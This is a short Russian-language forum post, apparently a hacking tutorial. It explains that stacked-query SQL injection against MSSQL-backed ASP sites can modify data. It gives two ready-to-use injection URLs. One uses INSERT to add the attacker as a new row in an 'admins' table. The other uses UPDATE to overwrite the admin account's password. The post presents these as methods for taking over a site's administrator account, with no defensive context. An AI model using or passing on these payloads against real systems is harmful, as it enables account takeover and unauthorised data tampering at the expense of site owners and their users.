так же хочу добавить от себя, в отличае от
mysql в
mssql возможна модификация данных в таблицах
INSERT
Команда INSERT вставляет новые записи в существующую таблицу. Тоесть мы можем найдя таблицу
admins добавить нового пользователя, то есть себя, не нанося существенный вред данным
Рассмотрим на примере:
Код:
http://site.ru/index.asp?id=1; INSERT INTO admins (id, login, password) VALUES (5,'Pantera','qwerty')--
В данном примере я добавил нового админа с id
5, логином
Pantera и паролем
qwerty;
UPDATE
Команда UPDATE обновляет столбцы таблицы table в соответствии с их новыми значениями
в строках существующей таблицы.
Это значит то, что мы можем поменять к примеру пароль конкретного юзера на свой
Рассмотрим на примере:
Допустим мы нашли таблицу с названием
admins и наша задача поменять пароль адмну с логином admin
делаеться это вот так:
Код:
http://site.ru/index.asp?id=1; UPDATE admins SET password = 'newpass' WHERE name='admin'--